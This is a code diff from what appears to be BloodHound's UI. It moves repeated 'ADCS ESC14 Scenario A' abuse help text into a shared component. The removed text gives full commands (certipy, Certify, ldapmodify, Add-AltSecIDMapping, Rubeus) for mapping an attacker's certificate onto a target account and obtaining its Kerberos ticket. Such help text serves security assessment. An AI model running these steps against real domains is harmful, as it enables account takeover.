Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit - certificate mapping string from the 'altSecurityIdentities' attribute of the target - principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/LinuxAbuse.tsx index fea3a480964..9b1bbfb7c43 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/LinuxAbuse.tsx @@ -16,7 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; -import CodeController from '../CodeController/CodeController'; +import { AdcsEsc14ScenarioALinux } from '../AdcsEsc14ScenarioA'; import { EdgeInfoProps } from '../index'; const LinuxAbuse: FC = ({ targetType }) => { @@ -110,104 +110,7 @@ const LinuxAbuse: FC = ({ targetType }) => { For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate - and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); case 'Computer': @@ -261,104 +164,7 @@ sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate - and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); case 'GPO': diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx index 750ba9812f8..67af5a336f3 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx @@ -16,7 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; -import CodeController from '../CodeController/CodeController'; +import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; import { EdgeInfoProps } from '../index'; const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, targetType }) => { @@ -99,116 +99,7 @@ const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, t For other optional parameters, view the Whisker documentation. - - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate - mapping string from the 'altSecurityIdentities' attribute of the target principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - + Targeted Kerberoast attack @@ -385,114 +276,7 @@ Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 } - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate - mapping string from the 'altSecurityIdentities' attribute of the target principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + ); case 'OU': diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx index 214794a9ccf..eae9bed84ba 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx @@ -16,6 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; +import { AdcsEsc14ScenarioALinux } from '../AdcsEsc14ScenarioA'; import { EdgeInfoProps } from '../index'; const LinuxAbuse: FC = ({ @@ -201,104 +202,7 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate - and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); case 'Computer': @@ -417,106 +321,7 @@ sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the - certificate and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); } else { @@ -590,106 +395,7 @@ sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the - certificate and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx index 695f139ed2d..60ab534a43a 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx @@ -16,6 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; +import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; import CodeController from '../CodeController/CodeController'; import { EdgeInfoProps } from '../index'; @@ -239,114 +240,7 @@ const WindowsAbuse: FC = For other optional parameters, view the Whisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the 